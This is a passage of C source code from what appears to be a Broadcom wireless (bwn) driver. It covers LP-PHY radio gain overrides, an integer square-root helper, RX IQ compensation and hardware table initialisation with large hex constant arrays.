BWN_PHY_RF_OVERRIDE_2_VAL, 0xf7ff, ext_lna << 11); BWN_PHY_WRITE(mac, BWN_PHY_RX_GAIN_CTL_OVERRIDE_VAL, lna); } else { low_gain = gain & 0xffff; high_gain = (gain >> 16) & 0xf; ext_lna = (gain >> 21) & 0x1; trsw = ~(gain >> 20) & 0x1; BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfffe, trsw); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfdff, ext_lna << 9); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfbff, ext_lna << 10); BWN_PHY_WRITE(mac, BWN_PHY_RX_GAIN_CTL_OVERRIDE_VAL, low_gain); BWN_PHY_SETMASK(mac, BWN_PHY_AFE_DDFS, 0xfff0, high_gain); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { tmp = (gain >> 2) & 0x3; BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xe7ff, tmp<<11); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xe6), 0xffe7, tmp << 3); } } BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x1); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x10); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x40); if (mac->mac_phy.rev >= 2) { BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x100); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x400); BWN_PHY_SET(mac, BWN_PHY_OFDM(0xe5), 0x8); } return; } BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2, 0x200); } static void bwn_phy_lp_set_deaf(struct bwn_mac *mac, uint8_t user) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; if (user) plp->plp_crsusr_off = 1; else plp->plp_crssys_off = 1; BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xff1f, 0x80); } static void bwn_phy_lp_clear_deaf(struct bwn_mac *mac, uint8_t user) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (user) plp->plp_crsusr_off = 0; else plp->plp_crssys_off = 0; if (plp->plp_crsusr_off || plp->plp_crssys_off) return; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xff1f, 0x60); else BWN_PHY_SETMASK(mac, BWN_PHY_CRSGAIN_CTL, 0xff1f, 0x20); } static unsigned int bwn_sqrt(struct bwn_mac *mac, unsigned int x) { /* Table holding (10 * sqrt(x)) for x between 1 and 256. */ static uint8_t sqrt_table[256] = { 10, 14, 17, 20, 22, 24, 26, 28, 30, 31, 33, 34, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 47, 48, 50, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 60, 61, 62, 63, 64, 64, 65, 66, 67, 67, 68, 69, 70, 70, 71, 72, 72, 73, 74, 74, 75, 76, 76, 77, 78, 78, 79, 80, 80, 81, 81, 82, 83, 83, 84, 84, 85, 86, 86, 87, 87, 88, 88, 89, 90, 90, 91, 91, 92, 92, 93, 93, 94, 94, 95, 95, 96, 96, 97, 97, 98, 98, 99, 100, 100, 100, 101, 101, 102, 102, 103, 103, 104, 104, 105, 105, 106, 106, 107, 107, 108, 108, 109, 109, 110, 110, 110, 111, 111, 112, 112, 113, 113, 114, 114, 114, 115, 115, 116, 116, 117, 117, 117, 118, 118, 119, 119, 120, 120, 120, 121, 121, 122, 122, 122, 123, 123, 124, 124, 124, 125, 125, 126, 126, 126, 127, 127, 128, 128, 128, 129, 129, 130, 130, 130, 131, 131, 131, 132, 132, 133, 133, 133, 134, 134, 134, 135, 135, 136, 136, 136, 137, 137, 137, 138, 138, 138, 139, 139, 140, 140, 140, 141, 141, 141, 142, 142, 142, 143, 143, 143, 144, 144, 144, 145, 145, 145, 146, 146, 146, 147, 147, 147, 148, 148, 148, 149, 149, 150, 150, 150, 150, 151, 151, 151, 152, 152, 152, 153, 153, 153, 154, 154, 154, 155, 155, 155, 156, 156, 156, 157, 157, 157, 158, 158, 158, 159, 159, 159, 160 }; if (x == 0) return (0); if (x >= 256) { unsigned int tmp; for (tmp = 0; x >= (2 * tmp) + 1; x -= (2 * tmp++) + 1) /* do nothing */ ; return (tmp); } return (sqrt_table[x - 1] / 10); } static int bwn_phy_lp_calc_rx_iq_comp(struct bwn_mac *mac, uint16_t sample) { #define CALC_COEFF(_v, _x, _y, _z) do { \ int _t; \ _t = _x - 20; \ if (_t >= 0) { \ _v = ((_y << (30 - _x)) + (_z >> (1 + _t))) / (_z >> _t); \ } else { \ _v = ((_y << (30 - _x)) + (_z << (-1 - _t))) / (_z << -_t); \ } \ } while (0) #define CALC_COEFF2(_v, _x, _y, _z) do { \ int _t; \ _t = _x - 11; \ if (_t >= 0) \ _v = (_y << (31 - _x)) / (_z >> _t); \ else \ _v = (_y << (31 - _x)) / (_z << -_t); \ } while (0) struct bwn_phy_lp_iq_est ie; uint16_t v0, v1; int tmp[2], ret; v1 = BWN_PHY_READ(mac, BWN_PHY_RX_COMP_COEFF_S); v0 = v1 >> 8; v1 |= 0xff; BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0xff00, 0x00c0); BWN_PHY_MASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0x00ff); ret = bwn_phy_lp_rx_iq_est(mac, sample, 32, &ie); if (ret == 0) goto done; if (ie.ie_ipwr + ie.ie_qpwr < 2) { ret = 0; goto done; } CALC_COEFF(tmp[0], bwn_nbits(ie.ie_iqprod), ie.ie_iqprod, ie.ie_ipwr); CALC_COEFF2(tmp[1], bwn_nbits(ie.ie_qpwr), ie.ie_qpwr, ie.ie_ipwr); tmp[1] = -bwn_sqrt(mac, tmp[1] - (tmp[0] * tmp[0])); v0 = tmp[0] >> 3; v1 = tmp[1] >> 4; done: BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0xff00, v1); BWN_PHY_SETMASK(mac, BWN_PHY_RX_COMP_COEFF_S, 0x00ff, v0 << 8); return ret; #undef CALC_COEFF #undef CALC_COEFF2 } static void bwn_phy_lp_tblinit_r01(struct bwn_mac *mac) { static const uint16_t noisescale[] = { 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa400, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0xa4a4, 0x00a4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4c00, 0x2d36, 0x0000, 0x0000, 0x4c00, 0x2d36, }; static const uint16_t crsgainnft[] = { 0x0366, 0x036a, 0x036f, 0x0364, 0x0367, 0x036d, 0x0374, 0x037f, 0x036f, 0x037b, 0x038a, 0x0378, 0x0367, 0x036d, 0x0375, 0x0381, 0x0374, 0x0381, 0x0392, 0x03a9, 0x03c4, 0x03e1, 0x0001, 0x001f, 0x0040, 0x005e, 0x007f, 0x009e, 0x00bd, 0x00dd, 0x00fd, 0x011d, 0x013d, }; static const uint16_t filterctl[] = { 0xa0fc, 0x10fc, 0x10db, 0x20b7, 0xff93, 0x10bf, 0x109b, 0x2077, 0xff53, 0x0127, }; static const uint32_t psctl[] = { 0x00010000, 0x000000a0, 0x00040000, 0x00000048, 0x08080101, 0x00000080, 0x08080101, 0x00000040, 0x08080101, 0x000000c0, 0x08a81501, 0x000000c0, 0x0fe8fd01, 0x000000c0, 0x08300105, 0x000000c0, 0x08080201, 0x000000c0, 0x08280205, 0x000000c0, 0xe80802fe, 0x000000c7, 0x28080206, 0x000000c0, 0x08080202, 0x000000c0, 0x0ba87602, 0x000000c0, 0x1068013d, 0x000000c0, 0x10280105, 0x000000c0, 0x08880102, 0x000000c0, 0x08280106, 0x000000c0, 0xe80801fd, 0x000000c7, 0xa8080115, 0x000000c0, }; static const uint16_t ofdmcckgain_r0[] = { 0x0001, 0x0001, 0x0001, 0x0001, 0x1001, 0x2001, 0x3001, 0x4001, 0x5001, 0x6001, 0x7001, 0x7011, 0x7021, 0x2035, 0x2045, 0x2055, 0x2065, 0x2075, 0x006d, 0x007d, 0x014d, 0x015d, 0x115d, 0x035d, 0x135d, 0x055d, 0x155d, 0x0d5d, 0x1d5d, 0x2d5d, 0x555d, 0x655d, 0x755d, }; static const uint16_t ofdmcckgain_r1[] = { 0x5000, 0x6000, 0x7000, 0x0001, 0x1001, 0x2001, 0x3001, 0x4001, 0x5001, 0x6001, 0x7001, 0x7011, 0x7021, 0x2035, 0x2045, 0x2055, 0x2065, 0x2075, 0x006d, 0x007d, 0x014d, 0x015d, 0x115d, 0x035d, 0x135d, 0x055d, 0x155d, 0x0d5d, 0x1d5d, 0x2d5d, 0x555d, 0x655d, 0x755d, }; static const uint16_t gaindelta[] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, }; static const uint32_t txpwrctl[] = { 0x00000050, 0x0000004f, 0x0000004e, 0x0000004d, 0x0000004c, 0x0000004b, 0x0000004a, 0x00000049, 0x00000048, 0x00000047, 0x00000046, 0x00000045, 0x00000044, 0x00000043, 0x00000042, 0x00000041, 0x00000040, 0x0000003f, 0x0000003e, 0x0000003d, 0x0000003c, 0x0000003b, 0x0000003a, 0x00000039, 0x00000038, 0x00000037, 0x00000036, 0x00000035, 0x00000034, 0x00000033, 0x00000032, 0x00000031, 0x00000030, 0x0000002f, 0x0000002e, 0x0000002d, 0x0000002c, 0x0000002b, 0x0000002a, 0x00000029, 0x00000028, 0x00000027, 0x00000026, 0x00000025, 0x00000024, 0x00000023, 0x00000022, 0x00000021, 0x00000020, 0x0000001f, 0x0000001e, 0x0000001d, 0x0000001c, 0x0000001b, 0x0000001a, 0x00000019, 0x00000018, 0x00000017, 0x00000016, 0x00000015, 0x00000014, 0x00000013, 0x00000012, 0x00000011, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x000075a0, 0x000075a0, 0x000075a1, 0x000075a1, 0x000075a2, 0x000075a2, 0x000075a3, 0x000075a3, 0x000074b0, 0x000074b0, 0x000074b1, 0x000074b1, 0x000074b2, 0x000074b2, 0x000074b3, 0x000074b3, 0x00006d20, 0x00006d20, 0x00006d21, 0x00006d21, 0x00006d22, 0x00006d22, 0x00006d23, 0x00006d23, 0x00004660, 0x00004660, 0x00004661, 0x00004661, 0x00004662, 0x00004662, 0x00004663, 0x00004663, 0x00003e60, 0x00003e60, 0x00003e61, 0x00003e61, 0x00003e62, 0x00003e62, 0x00003e63, 0x00003e63, 0x00003660, 0x00003660, 0x00003661, 0x00003661, 0x00003662, 0x00003662, 0x00003663, 0x00003663, 0x00002e60, 0x00002e60, 0x00002e61, 0x00002e61, 0x00002e62, 0x00002e62, 0x00002e63, 0x00002e63, 0x00002660, 0x00002660, 0x00002661, 0x00002661, 0x00002662, 0x00002662, 0x00002663, 0x00002663, 0x000025e0, 0x000025e0, 0x000025e1, 0x000025e1, 0x000025e2, 0x000025e2, 0x000025e3, 0x000025e3, 0x00001de0, 0x00001de0, 0x00001de1, 0x00001de1, 0x00001de2, 0x00001de2, 0x00001de3, 0x00001de3, 0x00001d60, 0x00001d60, 0x00001d61, 0x00001d61, 0x00001d62, 0x00001d62, 0x00001d63, 0x00001d63, 0x00001560, 0x00001560, 0x00001561, 0x00001561, 0x00001562, 0x00001562, 0x00001563, 0x00001563, 0x00000d60, 0x00000d60, 0x00000d61, 0x00000d61, 0x00000d62, 0x00000d62, 0x00000d63, 0x00000d63, 0x00000ce0, 0x00000ce0, 0x00000ce1, 0x00000ce1, 0x00000ce2, 0x00000ce2, 0x00000ce3, 0x00000ce3, 0x00000e10, 0x00000e10, 0x00000e11, 0x00000e11, 0x00000e12, 0x00000e12, 0x00000e13, 0x00000e13, 0x00000bf0, 0x00000bf0, 0x00000bf1, 0x00000bf1, 0x00000bf2, 0x00000bf2, 0x00000bf3, 0x00000bf3, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x04200000, 0x04000000, 0x000000ff, 0x000002fc, 0x0000fa08, 0x00000305, 0x00000206, 0x00000304, 0x0000fb04, 0x0000fcff, 0x000005fb, 0x0000fd01, 0x00000401, 0x00000006, 0x0000ff03, 0x000007fc, 0x0000fc08, 0x00000203, 0x0000fffb, 0x00000600, 0x0000fa01, 0x0000fc03, 0x0000fe06, 0x0000fe00, 0x00000102, 0x000007fd, 0x000004fb, 0x000006ff, 0x000004fd, 0x0000fdfa, 0x000007fb, 0x0000fdfa, 0x0000fa06, 0x00000500, 0x0000f902, 0x000007fa, 0x0000fafa, 0x00000500, 0x000007fa, 0x00000700, 0x00000305, 0x000004ff, 0x00000801, 0x00000503, 0x000005f9, 0x00000404, 0x0000fb08, 0x000005fd, 0x00000501, 0x00000405, 0x0000fb03, 0x000007fc, 0x00000403, 0x00000303, 0x00000402, 0x0000faff, 0x0000fe05, 0x000005fd, 0x0000fe01, 0x000007fa, 0x00000202, 0x00000504, 0x00000102, 0x000008fe, 0x0000fa04, 0x0000fafc, 0x0000fe08, 0x000000f9, 0x000002fa, 0x000003fe, 0x00000304, 0x000004f9, 0x00000100, 0x0000fd06, 0x000008fc, 0x00000701, 0x00000504, 0x0000fdfe, 0x0000fdfc, 0x000003fe, 0x00000704, 0x000002fc, 0x000004f9, 0x0000fdfd, 0x0000fa07, 0x00000205, 0x000003fd, 0x000005fb, 0x000004f9, 0x00000804, 0x0000fc06, 0x0000fcf9, 0x00000100, 0x0000fe05, 0x00000408, 0x0000fb02, 0x00000304, 0x000006fe, 0x000004fa, 0x00000305, 0x000008fc, 0x00000102, 0x000001fd, 0x000004fc, 0x0000fe03, 0x00000701, 0x000001fb, 0x000001f9, 0x00000206, 0x000006fd, 0x00000508, 0x00000700, 0x00000304, 0x000005fe, 0x000005ff, 0x0000fa04, 0x00000303, 0x0000fefb, 0x000007f9, 0x0000fefc, 0x000004fd, 0x000005fc, 0x0000fffd, 0x0000fc08, 0x0000fbf9, 0x0000fd07, 0x000008fb, 0x0000fe02, 0x000006fb, 0x00000702, }; KASSERT(mac->mac_phy.rev < 2, ("%s:%d: fail", __func__, __LINE__)); bwn_tab_write_multi(mac, BWN_TAB_1(2, 0), N(bwn_tab_sigsq_tbl), bwn_tab_sigsq_tbl); bwn_tab_write_multi(mac, BWN_TAB_2(1, 0), N(noisescale), noisescale); bwn_tab_write_multi(mac, BWN_TAB_2(14, 0), N(crsgainnft), crsgainnft); bwn_tab_write_multi(mac, BWN_TAB_2(8, 0), N(filterctl), filterctl); bwn_tab_write_multi(mac, BWN_TAB_4(9, 0), N(psctl), psctl); bwn_tab_write_multi(mac, BWN_TAB_1(6, 0), N(bwn_tab_pllfrac_tbl), bwn_tab_pllfrac_tbl); bwn_tab_write_multi(mac, BWN_TAB_2(0, 0), N(bwn_tabl_iqlocal_tbl), bwn_tabl_iqlocal_tbl); if (mac->mac_phy.rev == 0) { bwn_tab_write_multi(mac, BWN_TAB_2(13, 0), N(ofdmcckgain_r0), ofdmcckgain_r0); bwn_tab_write_multi(mac, BWN_TAB_2(12, 0), N(ofdmcckgain_r0), ofdmcckgain_r0); } else { bwn_tab_write_multi(mac, BWN_TAB_2(13, 0), N(ofdmcckgain_r1), ofdmcckgain_r1); bwn_tab_write_multi(mac, BWN_TAB_2(12, 0), N(ofdmcckgain_r1), ofdmcckgain_r1); } bwn_tab_write_multi(mac, BWN_TAB_2(15, 0), N(gaindelta), gaindelta); bwn_tab_write_multi(mac, BWN_TAB_4(10, 0), N(txpwrctl), txpwrctl); } static void bwn_phy_lp_tblinit_r2(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int i; static const uint16_t noisescale[] = { 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x0000, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4 }; static const uint32_t filterctl[] = { 0x000141fc, 0x000021fc, 0x000021b7, 0x0000416f, 0x0001ff27, 0x0000217f, 0x00002137, 0x000040ef, 0x0001fea7, 0x0000024f }; static const uint32_t psctl[] = { 0x00e38e08, 0x00e08e38, 0x00000000, 0x00000000, 0x00000000, 0x00002080, 0x00006180, 0x00003002, 0x00000040, 0x00002042, 0x00180047, 0x00080043, 0x00000041, 0x000020c1, 0x00046006, 0x00042002, 0x00040000, 0x00002003, 0x00180006, 0x00080002 }; static const uint32_t gainidx[] = { 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x10000001, 0x00000000, 0x20000082, 0x00000000, 0x40000104, 0x00000000, 0x60004207, 0x00000001, 0x7000838a, 0x00000001, 0xd021050d, 0x00000001, 0xe041c683, 0x00000001, 0x50828805, 0x00000000, 0x80e34288, 0x00000000, 0xb144040b, 0x00000000, 0xe1a6058e, 0x00000000, 0x12064711, 0x00000001, 0xb0a18612, 0x00000010, 0xe1024794, 0x00000010, 0x11630915, 0x00000011, 0x31c3ca1b, 0x00000011, 0xc1848a9c, 0x00000018, 0xf1e50da0, 0x00000018, 0x22468e21, 0x00000019, 0x4286d023, 0x00000019, 0xa347d0a4, 0x00000019, 0xb36811a6, 0x00000019, 0xf3e89227, 0x00000019, 0x0408d329, 0x0000001a, 0x244953aa, 0x0000001a, 0x346994ab, 0x0000001a, 0x54aa152c, 0x0000001a, 0x64ca55ad, 0x0000001a, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x10000001, 0x00000000, 0x20000082, 0x00000000, 0x40000104, 0x00000000, 0x60004207, 0x00000001, 0x7000838a, 0x00000001, 0xd021050d, 0x00000001, 0xe041c683, 0x00000001, 0x50828805, 0x00000000, 0x80e34288, 0x00000000, 0xb144040b, 0x00000000, 0xe1a6058e, 0x00000000, 0x12064711, 0x00000001, 0xb0a18612, 0x00000010, 0xe1024794, 0x00000010, 0x11630915, 0x00000011, 0x31c3ca1b, 0x00000011, 0xc1848a9c, 0x00000018, 0xf1e50da0, 0x00000018, 0x22468e21, 0x00000019, 0x4286d023, 0x00000019, 0xa347d0a4, 0x00000019, 0xb36811a6, 0x00000019, 0xf3e89227, 0x00000019, 0x0408d329, 0x0000001a, 0x244953aa, 0x0000001a, 0x346994ab, 0x0000001a, 0x54aa152c, 0x0000001a, 0x64ca55ad, 0x0000001a }; static const uint16_t auxgainidx[] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0001, 0x0002, 0x0004, 0x0016, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0001, 0x0002, 0x0004, 0x0016 }; static const uint16_t swctl[] = { 0x0128, 0x0128, 0x0009, 0x0009, 0x0028, 0x0028, 0x0028, 0x0028, 0x0128, 0x0128, 0x0009, 0x0009, 0x0028, 0x0028, 0x0028, 0x0028, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0128, 0x0128, 0x0009, 0x0009, 0x0028, 0x0028, 0x0028, 0x0028, 0x0128, 0x0128, 0x0009, 0x0009, 0x0028, 0x0028, 0x0028, 0x0028, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018 }; static const uint8_t hf[] = { 0x4b, 0x36, 0x24, 0x18, 0x49, 0x34, 0x23, 0x17, 0x48, 0x33, 0x23, 0x17, 0x48, 0x33, 0x23, 0x17 }; static const uint32_t gainval[] = { 0x00000008, 0x0000000e, 0x00000014, 0x0000001a, 0x000000fb, 0x00000004, 0x00000008, 0x0000000d, 0x00000001, 0x00000004, 0x00000007, 0x0000000a, 0x0000000d, 0x00000010, 0x00000012, 0x00000015, 0x00000000, 0x00000006, 0x0000000c, 0x00000000, 0x00000000, 0x00000000, 0x00000012, 0x00000000, 0x00000000, 0x00000000, 0x00000018, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000001e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000003, 0x00000006, 0x00000009, 0x0000000c, 0x0000000f, 0x00000012, 0x00000015, 0x00000018, 0x0000001b, 0x0000001e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000009, 0x000000f1, 0x00000000, 0x00000000 }; static const uint16_t gain[] = { 0x0000, 0x0400, 0x0800, 0x0802, 0x0804, 0x0806, 0x0807, 0x0808, 0x080a, 0x080b, 0x080c, 0x080e, 0x080f, 0x0810, 0x0812, 0x0813, 0x0814, 0x0816, 0x0817, 0x081a, 0x081b, 0x081f, 0x0820, 0x0824, 0x0830, 0x0834, 0x0837, 0x083b, 0x083f, 0x0840, 0x0844, 0x0857, 0x085b, 0x085f, 0x08d7, 0x08db, 0x08df, 0x0957, 0x095b, 0x095f, 0x0b57, 0x0b5b, 0x0b5f, 0x0f5f, 0x135f, 0x175f, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000 }; static const uint32_t papdeps[] = { 0x00000000, 0x00013ffc, 0x0001dff3, 0x0001bff0, 0x00023fe9, 0x00021fdf, 0x00028fdf, 0x00033fd2, 0x00039fcb, 0x00043fc7, 0x0004efc2, 0x00055fb5, 0x0005cfb0, 0x00063fa8, 0x00068fa3, 0x00071f98, 0x0007ef92, 0x00084f8b, 0x0008df82, 0x00097f77, 0x0009df69, 0x000a3f62, 0x000adf57, 0x000b6f4c, 0x000bff41, 0x000c9f39, 0x000cff30, 0x000dbf27, 0x000e4f1e, 0x000edf16, 0x000f7f13, 0x00102f11, 0x00110f10, 0x0011df11, 0x0012ef15, 0x00143f1c, 0x00158f27, 0x00172f35, 0x00193f47, 0x001baf5f, 0x001e6f7e, 0x0021cfa4, 0x0025bfd2, 0x002a2008, 0x002fb047, 0x00360090, 0x003d40e0, 0x0045c135, 0x004fb189, 0x005ae1d7, 0x0067221d, 0x0075025a, 0x007ff291, 0x007ff2bf, 0x007ff2e3, 0x007ff2ff, 0x007ff315, 0x007ff329, 0x007ff33f, 0x007ff356, 0x007ff36e, 0x007ff39c, 0x007ff441, 0x007ff506 }; static const uint32_t papdmult[] = { 0x001111e0, 0x00652051, 0x00606055, 0x005b005a, 0x00555060, 0x00511065, 0x004c806b, 0x0047d072, 0x00444078, 0x00400080, 0x003ca087, 0x0039408f, 0x0035e098, 0x0032e0a1, 0x003030aa, 0x002d80b4, 0x002ae0bf, 0x002880ca, 0x002640d6, 0x002410e3, 0x002220f0, 0x002020ff, 0x001e510e, 0x001ca11e, 0x001b012f, 0x00199140, 0x00182153, 0x0016c168, 0x0015817d, 0x00145193, 0x001321ab, 0x001211c5, 0x001111e0, 0x001021fc, 0x000f321a, 0x000e523a, 0x000d925c, 0x000cd27f, 0x000c12a5, 0x000b62cd, 0x000ac2f8, 0x000a2325, 0x00099355, 0x00091387, 0x000883bd, 0x000813f5, 0x0007a432, 0x00073471, 0x0006c4b5, 0x000664fc, 0x00061547, 0x0005b598, 0x000565ec, 0x00051646, 0x0004d6a5, 0x0004870a, 0x00044775, 0x000407e6, 0x0003d85e, 0x000398dd, 0x00036963, 0x000339f2, 0x00030a89, 0x0002db28 }; static const uint32_t gainidx_a0[] = { 0x001111e0, 0x00652051, 0x00606055, 0x005b005a, 0x00555060, 0x00511065, 0x004c806b, 0x0047d072, 0x00444078, 0x00400080, 0x003ca087, 0x0039408f, 0x0035e098, 0x0032e0a1, 0x003030aa, 0x002d80b4, 0x002ae0bf, 0x002880ca, 0x002640d6, 0x002410e3, 0x002220f0, 0x002020ff, 0x001e510e, 0x001ca11e, 0x001b012f, 0x00199140, 0x00182153, 0x0016c168, 0x0015817d, 0x00145193, 0x001321ab, 0x001211c5, 0x001111e0, 0x001021fc, 0x000f321a, 0x000e523a, 0x000d925c, 0x000cd27f, 0x000c12a5, 0x000b62cd, 0x000ac2f8, 0x000a2325, 0x00099355, 0x00091387, 0x000883bd, 0x000813f5, 0x0007a432, 0x00073471, 0x0006c4b5, 0x000664fc, 